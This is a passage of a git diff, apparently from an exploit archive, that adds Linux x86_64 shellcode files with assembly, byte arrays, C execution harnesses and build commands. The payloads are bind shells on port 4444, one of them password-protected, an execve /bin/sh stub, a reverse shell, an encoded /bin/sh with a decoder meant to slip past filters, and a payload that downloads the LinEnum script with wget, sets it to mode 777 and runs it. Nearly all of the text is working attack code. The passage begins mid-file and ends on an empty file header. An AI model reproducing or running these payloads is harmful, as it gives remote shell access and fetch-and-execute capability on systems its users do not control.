+;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444"
+
+
+================== ASSEMBLY ========================================
+
+
+global _start
+
+
+section .text
+
+_start:
+		
+	
+	xor rsi,	rsi	;set rsi to zero, since we will push syscall and first param on the stack and then pop it of we don't need to
+				;set rax and rdi to zero
+
+create_socket:
+	
+	;int socket(int domain, int type, int protocol);
+	push 41			;sys_socket
+	pop rax
+	push 2
+	pop rdi	
+	inc rsi			;SOCK_STREAM
+	xor rdx,	rdx
+	syscall
+
+	;save the return value for future use
+	xchg rdi, rax
+
+	
+	; sin_zero:        0
+	; sin_addr.s_addr: INADDR_ANY = 0
+	; sin_port:        4444 
+	; sin_family:      AF_INET = 2
+	xor rax, rax
+	push rax			; sin_zero 
+	push rax			; zero out another 8 bytes for remaining members
+	mov word [rsp+2], 0x5c11	; sin_port = 4444
+	mov byte [rsp], 0x2		; sin_family
+
+bind:
+	;int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
+	xor 	rdx,	rdx	
+	push 	49
+	pop 	rax
+	push	rsp	
+	pop 	rsi		;sockaddr stack pointer
+	add	rdx,	16	;sizeof sockaddr
+	syscall
+
+
+listen:
+	;int listen(int sockfd, int backlog);
+	xor     rsi,	rsi
+	push 	50		;sys_listen
+	pop 	rax
+	inc 	rsi		;backlog = number of clients 
+	syscall
+
+	
+accept:
+	;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
+	push 	43 		;sys_accept
+	pop 	rax
+	mov rsi, rsp		; stack pointer for client sockaddr
+	mov byte [rsp-1], 0x10	; put size of the structure on the stack
+	dec rsp			; adjust stack pointer for previous
+	mov rdx, rsp		; stack pointer for struct size
+	syscall
+
+	;save client socket 
+	xchg r10,	 rax
+
+	
+close:
+	;int close(int fd);
+	push	3		;sys_close
+	pop 	rax
+	push	rax		;save 3 on the stack for rsi in dup2
+	syscall
+
+
+	xchg    rdi,	r10	;client socket as first parameter for dup2
+	pop 	rsi
+	
+dup2loop:
+	
+	;int dup2(int oldfd, int newfd);
+	push	33		;sys_dup2
+	pop	rax
+	dec 	rsi		
+	syscall
+	loopnz  dup2loop	
+	
+
+
+spawn_shell:
+	
+	;int execve(const char *filename, char *const argv[], char *const envp[]);
+	xor eax,	eax
+	add al,		59			;sys_execve
+	xor rdi,	rdi			;set rdi to zero
+	push rdi				;push null on the stack
+	mov rdi,	0x68732F2f6e69622F	;bin//sh in reverse
+	push rdi				
+	mov rdi,	rsp			;set stack pointer to rdi
+	xor rsi,	rsi			;rsi and rdx == 0
+	xor rdx,	rdx
+	syscall
+
+
+
+=======Generate Shellcode==========================================
+nasm -felf64 tcp_bind.nasm -o tcp_bind.o 
+ld tcp_bind.o -o tcp_bind
+
+
+=========generate C program to exploit=============================
+gcc -fno-stack-protector -z execstack bind.c -o bind
+
+
+======================C program=====================================
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[]=\
+        "\x48\x31\xf6\x6a\x29\x58\x6a\x02\x5f\x48\xff\xc6\x48"
+        "\x31\xd2\x0f\x05\x48\x97\x48\x31\xc0\x50\x50\x66\xc7"
+        "\x44\x24\x02\x11\x5c\xc6\x04\x24\x02\x48\x31\xd2\x6a"
+        "\x31\x58\x54\x5e\x48\x83\xc2\x10\x0f\x05\x48\x31\xf6"
+        "\x6a\x32\x58\x48\xff\xc6\x0f\x05\x6a\x2b\x58\x48\x89"
+        "\xe6\xc6\x44\x24\xff\x10\x48\xff\xcc\x48\x89\xe2\x0f"
+        "\x05\x49\x92\x6a\x03\x58\x50\x0f\x05\x49\x87\xfa\x5e"
+        "\x6a\x21\x58\x48\xff\xce\x0f\x05\xe0\xf6\x31\xc0\x04"
+        "\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f"
+        "\x73\x68\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05";
+
+int main(){
+
+        printf("length of your shellcode is: %d\n", (int)strlen(shellcode));
+
+        int (*ret)() = (int(*)())shellcode;
+
+        ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/46979.c b/shellcodes/linux_x86-64/46979.c
new file mode 100644
index 000000000..c9273ed47
--- /dev/null
+++ b/shellcodes/linux_x86-64/46979.c
@@ -0,0 +1,166 @@
+;Title: Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) (104 bytes)
+;Author: Aron Mihaljevic
+;Architecture: Linux x86_64
+;Shellcode Length:  104 bytes
+;github = https://github.com/STARRBOY	
+;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444"
+
+
+================== ASSEMBLY ========================================
+
+global _start
+
+
+section .text
+
+_start:
+		
+	
+
+	;create_socket
+	;int socket(AF_INET, SOCK_STREAM, 0);
+
+	push 	41	        ;sys_socket
+	pop 	rax
+	push 	2	        ;AF_INET	
+	pop 	rdi
+	push	1	        ;SOCK_STREAM
+	pop	rsi
+	xor 	rdx,	rdx
+	syscall
+
+	;save the return value for future use
+	xchg rdi, rax
+	
+
+	; sin_zero:        0
+    ; sin_addr.s_addr: INADDR_ANY = 0
+    ; sin_port:        4444
+    ; sin_family:      AF_INET = 2
+
+	push	2		            ;sin_family = AF_INET
+	mov word [rsp + 2], 0x5c11	;port = 4444
+	push	rsp
+	pop	rsi		
+
+
+
+
+bind:
+	;int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
+
+	push 	49		        ;sys_bind
+	pop 	rax
+	push	rsp	
+	pop 	rsi		        ;sockaddr stack pointer
+	push	16		        ;sizeof sockaddr
+	pop	rdx
+	syscall
+
+
+listen:
+	;int listen(int sockfd, int backlog);
+		
+	push 	50		    ;sys_listen
+	pop 	rax
+	push	1
+	pop	rsi		        ;backlog = number of clients = 1 
+	syscall
+
+	
+accept:
+	;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);	
+
+
+		
+
+	push	43		    ;sys_accept
+	pop	rax
+	sub	rsp,	16	    ;size of the structure on the stack
+	push	rsp
+	pop	rsi		        ;struct sockaddr
+	push	16		    ;length of the  address
+	push	rsp		    ;stack pointer for struct size
+	pop	rdx		
+	syscall
+	
+	
+	xchg r10, 	rax	    ;save client socket in r10, since we won't use that register  for any other operation
+
+	
+close:
+	;int close(int fd);
+	
+	push	3		    ;sys_close
+	pop 	rax
+	push	rax	    	;save 3 on the stack for rsi in dup2
+	syscall
+
+	
+	xchg    rdi,	r10	;client socket as first parameter for dup2
+	pop 	rsi		    ;parameter for dup2 = 3 
+	
+dup2loop:
+	
+	; int dup2(int oldfd, int newfd);
+
+	push	33		    ;sys_dup2
+	pop	    rax
+	dec 	rsi		
+	syscall
+	loopnz  dup2loop	
+		
+
+
+spawn_shell:
+	
+	;int execve(const char *filename, char *const argv[],char *const envp[]);
+
+	xor     rsi,	rsi			         ;clear rsi
+	push	rsi			                 ;push null on the stack
+	mov 	rdi,	0x68732f2f6e69622f	 ;/bin//sh in reverse order
+	push	rdi
+	push	rsp		
+	pop	    rdi	        			    ;stack pointer to /bin//sh
+	mov 	al,	    59      			;sys_execve
+	cdq					                ;sign extend of eax
+	syscall
+
+
+
+
+
+
+=======Generate Shellcode==========================================
+nasm -felf64 tcp_bind_shell.nasm -o tcp_bind_shell.o 
+ld tcp_bind_shell.o -o tcp_bind_shell
+
+
+=========generate C program to exploit=============================
+gcc -fno-stack-protector -z execstack bind.c -o bind
+
+
+======================C program=====================================
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[]=\
+		 "\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05"
+		 "\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x11\x5c\x54\x5e\x6a"
+		 "\x31\x58\x54\x5e\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x01"
+		 "\x5e\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x54\x5e\x6a\x10"
+		 "\x54\x5a\x0f\x05\x49\x92\x6a\x03\x58\x50\x0f\x05\x49\x87"
+		 "\xfa\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\xe0\xf6\x48\x31"
+		 "\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54"
+		 "\x5f\xb0\x3b\x99\x0f\x05";
+
+
+int main(){
+
+        printf("length of your shellcode is: %d\n", (int)strlen(shellcode));
+
+        int (*ret)() = (int(*)())shellcode;
+
+        ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/47008.c b/shellcodes/linux_x86-64/47008.c
new file mode 100644
index 000000000..a7523757a
--- /dev/null
+++ b/shellcodes/linux_x86-64/47008.c
@@ -0,0 +1,51 @@
+Title: Linux/x86_64 - execve(/bin/sh) (22 bytes)
+;Author: Aron Mihaljevic
+;Architecture: Linux x86_64
+;Shellcode Length:  22 bytes
+;github = https://github.com/STARRBOY	
+
+
+============ASM===========================
+global _start
+
+section .text
+
+_start:
+
+	
+	
+	;int execve(const char *filename, char *const argv[],char *const envp[])
+	xor 	rsi,	rsi			;clear rsi
+	push	rsi				;push null on the stack
+	mov 	rdi,	0x68732f2f6e69622f	 ;/bin//sh in reverse order
+	push	rdi
+	push	rsp		
+	pop	rdi				;stack pointer to /bin//sh
+	mov 	al,	59			;sys_execve
+	cdq					;sign extend of eax
+	syscall
+
+=======Generate Shellcode==========================================
+nasm -felf64 spawn_shell.nasm -o spawn_shell.o 
+ld spawn_shell.o -o spawn_shell
+
+
+=========generate C program to exploit=============================
+gcc -fno-stack-protector -z execstack shell.c -o shell
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[]= \
+                  "\x48\x31\xf6\x56\x48\xbf"
+		  "\x2f\x62\x69\x6e\x2f"
+		  "\x2f\x73\x68\x57\x54"
+		  "\x5f\xb0\x3b\x99\x0f\x05";
+int main(){
+
+        printf("length of your shellcode is: %d\n", (int)strlen(code));
+
+        int (*ret)() = (int(*)())code;
+
+        ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/47025.c b/shellcodes/linux_x86-64/47025.c
new file mode 100644
index 000000000..4af6c478b
--- /dev/null
+++ b/shellcodes/linux_x86-64/47025.c
@@ -0,0 +1,126 @@
+/*
+ 
+Title: Linux/x86_64 - Reverse(0.0.0.0:4444/TCP)Shell(/bin/sh)- Null Free Shellcode
+;Author: Aron Mihaljevic
+;Architecture: Linux x86_64
+;Shellcode Length:  70 bytes
+;github = https://github.com/STARRBOY
+
+compilation and execution of assembly code
+-------------------------------------
+nasm -felf64 reverse.nasm -o reverse.o
+ld reverse.o -o reverse
+---------------------------
+dumping binaries
+----------------------------------------------------------------------------------
+for i in $(objdump -d reverse |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
+----------------------------------------------------------------------------------
+C program 
+-------------------------------------------------------------------
+gcc -fno-stack-protector -z execstack reverse_tcp.c -o reverse_tcp
+----------------------------------------------------------------
+test:
+open a terminal and run this " nc -l 0.0.0.0 4444 "
+
+after you have done that, 
+open another one and run a shellcode
+
+
+
+global _start
+
+section .text
+
+_start:
+	 
+        
+    ; create socket 
+        ; sock = socket(AF_INET, SOCK_STREAM, 0)
+        ; AF_INET = 2
+        ; SOCK_STREAM = 1
+        ; syscall number 41 	
+       
+	push 41       	;sys_socket
+	pop rax		
+        push 2		; AF_INET
+        pop rdi
+       	push 1		;SOCK_STREAM
+        pop rsi
+        xor rdx,	rdx		;rdx = 0
+        syscall
+
+
+	xchg rdi,	rax	;save a socket descriptor
+	
+connect:
+	
+	; struct sockaddr_in addr;
+    	; addr.sin_family = AF_INET;
+    	; addr.sin_port = htons(4444);
+   	; addr.sin_addr.s_addr = inet_addr("0.0.0.0");
+   	; connect(connect_socket_fd, (struct sockaddr *)&addr, sizeof(addr));
+	
+	push    2               ;sin_family = AF_INET
+        mov word [rsp + 2], 0x5c11      ;port = 4444
+        push    rsp
+	
+	push	42		;sys_connect
+	pop 	rax 		
+				;rdi already contains a socket descriptor
+	pop 	rsi		;(addr.sin_port,2 bytes) push htons(4444)
+	push	16		;sizeof(addr)
+	pop	rdx
+	syscall
+
+    	push 	3		;push counter
+        pop 	rsi
+dup2loop:
+	
+        ; int dup2(int oldfd, int newfd);
+
+	push	33		;dup2 syscall
+	pop	rax
+        dec 	rsi		;next number
+        syscall
+        loopnz dup2loop  	;loop
+	
+spawn_shell:
+
+	; int execve(const char *filename, char *const argv[],char *const envp[]);
+
+
+	xor     rsi,	rsi			 ;clear rsi
+	push	rsi			         ;push null on the stack
+	mov 	rdi,	0x68732f2f6e69622f	 ;/bin//sh in reverse order
+	push	rdi
+	push	rsp		
+	pop	rdi	        		 ;stack pointer to /bin//sh
+	mov 	al,	    59      		 ;sys_execve
+	cdq					 ;sign extend of eax
+	syscall
+
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[]=\
+		 "\x6a\x29\x58\x6a\x02\x5f\x6a\x01"
+		 "\x5e\x48\x31\xd2\x0f\x05\x48\x97"
+		 "\x6a\x02\x66\xc7\x44\x24\x02\x11"
+		 "\x5c\x54\x6a\x2a\x58\x5e\x6a\x10"
+		 "\x5a\x0f\x05\x6a\x03\x5e\x6a\x21"
+		 "\x58\x48\xff\xce\x0f\x05\xe0\xf6"
+		 "\x48\x31\xf6\x56\x48\xbf\x2f\x62"
+		 "\x69\x6e\x2f\x2f\x73\x68\x57\x54"
+		 "\x5f\xb0\x3b\x99\x0f\x05";
+
+
+int main(){
+
+        printf("length of your shellcode is: %d\n", (int)strlen(shellcode));
+
+        int (*ret)() = (int(*)())shellcode;
+
+        ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/47151.c b/shellcodes/linux_x86-64/47151.c
new file mode 100644
index 000000000..02b6a80bc
--- /dev/null
+++ b/shellcodes/linux_x86-64/47151.c
@@ -0,0 +1,66 @@
+/* 
+LinEnum (Linux Enumeration) Wget & CHMOD & Run Shellcode Language C & ASM - Linux/x86_64
+
+author : Kağan Çapar
+contact: kagancapar@gmail.com
+shellcode len : 155 bytes
+compilation: gcc -o shellcode shellcode.c
+
+test:
+run ./shellcode
+
+description: First, the linenum script is via github with wget command. After change mod 777 and run!
+
+assembly:
+
+_start:
+push    0x3b {var_8}  {"content.com/rebootuser/LinEnum/m…"}
+pop     rax {var_8}  {0x3b, "content.com/rebootuser/LinEnum/m…"}
+cdq     {0x3b, "content.com/rebootuser/LinEnum/m…"}  {0x0}  {0x3b, "content.com/rebootuser/LinEnum/m…"}
+mov     rbx, 0x68732f6e69622f
+push    rbx {var_8}  {0x68732f6e69622f}
+mov     rdi, rsp {var_8}
+push    0x632d {var_10}
+mov     rsi, rsp {var_10}
+push    rdx {var_18}  {0x0}
+call    sub_94  {sub_20, "wget https://raw.githubuserconte…"} { Falls through into sub_20 }
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char library[] =
+"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
+"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x74\x00"
+"\x00\x00\x77\x67\x65\x74\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f"
+"\x72\x61\x77\x2e\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63"
+"\x6f\x6e\x74\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x72\x65\x62\x6f"
+"\x6f\x74\x75\x73\x65\x72\x2f\x4c\x69\x6e\x45\x6e\x75\x6d\x2f"
+"\x6d\x61\x73\x74\x65\x72\x2f\x4c\x69\x6e\x45\x6e\x75\x6d\x2e"
+"\x73\x68\x20\x26\x26\x20\x63\x68\x6d\x6f\x64\x20\x37\x37\x37"
+"\x20\x4c\x69\x6e\x45\x6e\x75\x6d\x2e\x73\x68\x20\x26\x26\x20"
+"\x2e\x2f\x4c\x69\x6e\x45\x6e\x75\x6d\x2e\x73\x68\x00\x56\x57"
+"\x48\x89\xe6\x0f\x05";
+
+int main(int argc, char **argv) {
+    printf("library Length: %zd Bytes\n", strlen(library));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, library, sizeof(library));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/47183.c b/shellcodes/linux_x86-64/47183.c
new file mode 100644
index 000000000..58dc7dafe
--- /dev/null
+++ b/shellcodes/linux_x86-64/47183.c
@@ -0,0 +1,167 @@
+/*
+######################################## description ########################################
+
+; Title     : X64 [NOT +SHIFT-N+ XOR-N] encoded /bin/sh - shellcode
+; Author    : Pedro Cabral
+; Twitter   : @CabrallPedro
+; LinkedIn  : https://www.linkedin.com/in/pedro-cabral1992
+; SLAE ID   : SLAE64 - 1603
+; Purpose   : spawn /bin/sh shell
+; Tested On : Ubuntu 16.04.6 LTS
+; Arch      : x64
+; Size      : 168 bytes
+
+########################################## sh.asm ###########################################
+
+global _start
+
+section .text
+
+_start:
+        xor rax, rax
+        push rax ; push null
+        mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse
+        push rbx ; push to the stack
+        mov rdi, rsp ; store the /bin//sh on rdi
+        push rax ; push null
+        mov rdx, rsp ; set rdx
+        push rdi ; push the address of /bin//sh
+        mov rsi, rsp ; set rsi
+        add rax, 59 ; rax = 59 (execve)
+        syscall
+
+
+#################################### original shellcode #####################################
+
+pedro@ubuntu>nasm -felf64 sh.asm -o sh.o
+pedro@ubuntu>ld -N -o sh sh.o
+pedro@ubuntu>echo;objdump -d ./sh.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo
+
+"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"
+
+
+########################################  encode.py  ########################################
+
+#!/usr/bin/python
+
+import sys
+
+if len(sys.argv) != 3:
+        print "Usage : python encode.py <SHIFT number> <XOR number>"
+        sys.exit(0)
+
+shift   = int(sys.argv[1])
+xor     = int(sys.argv[2])
+
+shellcode = ("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05")
+
+
+# addition to the inicial of the shellcode the SHIFT and XOR values
+encoded_shellcode =""
+encoded_shellcode += '0x01' #prevent null bytes on the shellcode 
+encoded_shellcode += '%02x, ' %shift
+encoded_shellcode += '0x'
+encoded_shellcode += '%02x, ' %xor
+
+# [NOT + SHL-N + XOR-N] encoded shellcode
+for i in bytearray(shellcode):
+	new = ~i & 0xff
+	new = new << shift
+        new = new ^ xor
+        encoded_shellcode += '0x'
+        encoded_shellcode += '%02x, ' %new
+
+# end of shellcode
+encoded_shellcode += '0x'
+encoded_shellcode += '%02x, ' %xor
+encoded_shellcode += '0x'
+encoded_shellcode += '%02x' %xor
+
+# print encoded shellcode
+print encoded_shellcode
+
+#################################### Encoded Shellcode  #####################################
+
+pedro@ubuntu>python encoder.py 4 1337
+0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539
+
+####################################### decoder.asm  ########################################
+
+global _start
+
+section .text
+
+_start:
+
+	jmp decoder
+	encoded : dw 0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539
+
+decoder:
+	lea rsi, [rel encoded]
+
+	xor rcx, rcx
+	xor r9,r9
+	xor r10,r10
+
+	mov word cx, [rsi]
+	inc rsi
+	inc rsi
+	mov word r9w, [rsi]
+	inc rsi
+	inc rsi
+	push rsi
+	mov rdi, rsi
+main: ; 			to deal with 0xff on the original shellcode
+	mov word r10w,[rsi]
+	xor r10w, r9w
+	jz second_check
+main2:
+	shr r10, cl
+	not word r10w
+	mov byte [rdi], r10b
+	inc rsi
+	inc rsi
+	inc rdi
+	jmp short main
+
+second_check:
+	mov word r10w, [rsi+2]
+	xor r10w, r9w
+	jz call_encoded
+	mov word r10w, [rsi]
+	xor r10w, r9w
+	jmp main2
+
+call_encoded:
+	call [rsp]
+
+###################################### final shellcode ######################################
+
+pedro@ubuntu>nasm -felf64 decoder.asm -o decoder.o
+pedro@ubuntu>echo;objdump -d ./decoder.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo
+
+"\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24"
+
+pedro@ubuntu>gcc -fno-stack-protector -z execstack testShellcode.c -o testShellcode
+pedro@ubuntu>./testShellcode 
+Shellcode Length:	168
+$ whoami
+pedro
+*/
+
+
+#include<stdio.h>
+#include<string.h>
+
+
+unsigned char code[] = \
+"\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24";
+
+void main(){
+	printf("Shellcode Length:	%zu\n",strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/47290.c b/shellcodes/linux_x86-64/47290.c
new file mode 100644
index 000000000..176bcdeff
--- /dev/null
+++ b/shellcodes/linux_x86-64/47290.c
@@ -0,0 +1,189 @@
+/*
+; Title		: Linux/x86_64 - Bind Shell (/bin/sh) with Password (configurable) (129 bytes)
+; Date		: 2019-08-18
+; Author	: Gonçalo Ribeiro (@goncalor)
+; Website	: goncalor.com
+; SLAE64-ID	: 1635
+
+global _start
+
+%define pass "pass"
+%define port 0x5c11  ; htons(4444)
+
+_start:
+    jmp real_start
+    password: db pass
+    pass_len: db $-password
+
+real_start:
+socket:
+    ; sock = socket(AF_INET, SOCK_STREAM, 0)
+    ; AF_INET = 2
+    ; SOCK_STREAM = 1
+    ; __NR_socket = 41
+    ; On success, a file descriptor for the new socket is returned
+
+    push 41
+    pop rax
+    push 2
+    pop rdi
+    push 1
+    pop rsi
+    cdq       ; copies rax's bit 31 to all bits of edx (zeroes rdx)
+    syscall
+
+    push rax
+    pop rdi
+
+bind:
+    ; server.sin_family = AF_INET;    short
+    ; server.sin_port = htons(4444);    unsigned short
+    ; server.sin_addr.s_addr = INADDR_ANY;    unsigned long
+    ; bzero(&server.sin_zero, 8);
+    ;
+    ; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html
+    ; struct sockaddr_in {
+    ;     short            sin_family;
+    ;     unsigned short   sin_port;
+    ;     struct in_addr   sin_addr;
+    ;     char             sin_zero[8];
+    ; };
+    ;
+    ; bind(sock, (struct sockaddr *)&server, sockaddr_len)
+    ; INADDR_ANY = 0
+    ; AF_INET = 2
+    ; __NR_bind = 49
+    ; On  success,  zero is returned
+
+    xor eax, eax  ; shorter and will still zero the upper bytes
+    push rax      ; sin_zero
+    push ax
+    push ax       ; sin_addr
+    push word port
+    push word 2
+
+    ; bind
+    add al, 49
+    push rsp
+    pop rsi
+    add dl, 16    ; sizeof(sockaddr_in)
+    syscall
+
+listen:
+    ; listen(sock, 2)
+    ; __NR_listen = 50
+    ; On success, zero is returned
+
+    mov al, 50
+    xor esi, esi
+    mov sil, 2
+    syscall
+
+accept:
+    ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
+    ; __NR_accept = 43
+    ; On success, a file descriptor is returned
+
+    mov al, 43
+    xor esi, esi
+    ;xor rdx, rdx  ; already zeroed
+    syscall
+
+    push rax
+
+;close:
+    ; close(sock)
+    ; __NR_close = 3
+    ; returns zero on success
+
+    ; closing is not strictly necessary
+    ;mov al, 3
+    ;syscall
+
+dup2:
+    ; dup2(new, 0);
+    ; dup2(new, 1);
+    ; dup2(new, 2);
+    ; __NR_dup2 = 33
+    ; On success, return the new file descriptor
+
+    pop rdi        ; "new" was pushed in accept()
+    push 2
+    pop rsi
+
+dup2_loop:
+    mov al, 33
+    syscall
+    dec esi
+    jns dup2_loop
+
+read_password:
+    ; read(int fd, void *buf, size_t count)
+    ; On success, the number of bytes read is returned
+
+    ;xor eax, eax  ; already done by dup2
+    ;rdi = "new"   ; already done in dup2
+    push rax
+    push rax       ; create space for "buf" in the stack
+    push rsp
+    pop rsi        ; rsi = *buf
+    mov dl, 16
+    syscall
+
+compare_password:
+    xor ecx, ecx
+    lea rdi, [rel pass_len]
+    mov cl, [rdi]
+    sub rdi, rcx
+    cld
+    repz cmpsb
+    jne exit
+
+execve:
+    ; execve(const char *path, char *const argv[], char *const envp[])
+    ; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding)
+    ; rsi, argv = (char**) (/bin//sh, 0x00)
+    ; rdx, envp = &0x00
+
+    xor eax, eax
+    push rax
+    push rsp
+    pop rdx      ; *rdx = &0x00
+
+    mov rsi, 0x68732f2f6e69622f  ; rax2 -S $(echo /bin//sh | rev)
+    push rsi
+    push rsp
+    pop rdi      ; rdi = (char*) /bin//sh
+
+    push rax
+    push rdi
+    push rsp
+    pop rsi      ; rsi = (char**) (/bin//sh, 0x00)
+
+    mov al, 59
+    syscall
+
+exit:
+    ;xor eax, eax  ; upper bytes are zero after read
+    mov al, 60
+    syscall
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+char code[] =
+"\xeb\x05\x70\x61\x73\x73\x04\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f"
+"\x05\x50\x5f\x31\xc0\x50\x66\x50\x66\x50\x66\x68\x11\x5c\x66\x6a\x02\x04"
+"\x31\x54\x5e\x80\xc2\x10\x0f\x05\xb0\x32\x31\xf6\x40\xb6\x02\x0f\x05\xb0"
+"\x2b\x31\xf6\x0f\x05\x50\x5f\x6a\x02\x5e\xb0\x21\x0f\x05\xff\xce\x79\xf8"
+"\x50\x50\x54\x5e\xb2\x10\x0f\x05\x31\xc9\x48\x8d\x3d\xad\xff\xff\xff\x8a"
+"\x0f\x48\x29\xcf\xfc\xf3\xa6\x75\x1a\x31\xc0\x50\x54\x5a\x48\xbe\x2f\x62"
+"\x69\x6e\x2f\x2f\x73\x68\x56\x54\x5f\x50\x57\x54\x5e\xb0\x3b\x0f\x05\xb0"
+"\x3c\x0f\x05";
+
+int main() {
+    printf("length: %lu\n", strlen(code));
+    ((int(*)()) code)();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/47291.c b/shellcodes/linux_x86-64/47291.c
new file mode 100644
index 000000000..bbc44c671
--- /dev/null
+++ b/shellcodes/linux_x86-64/47291.c
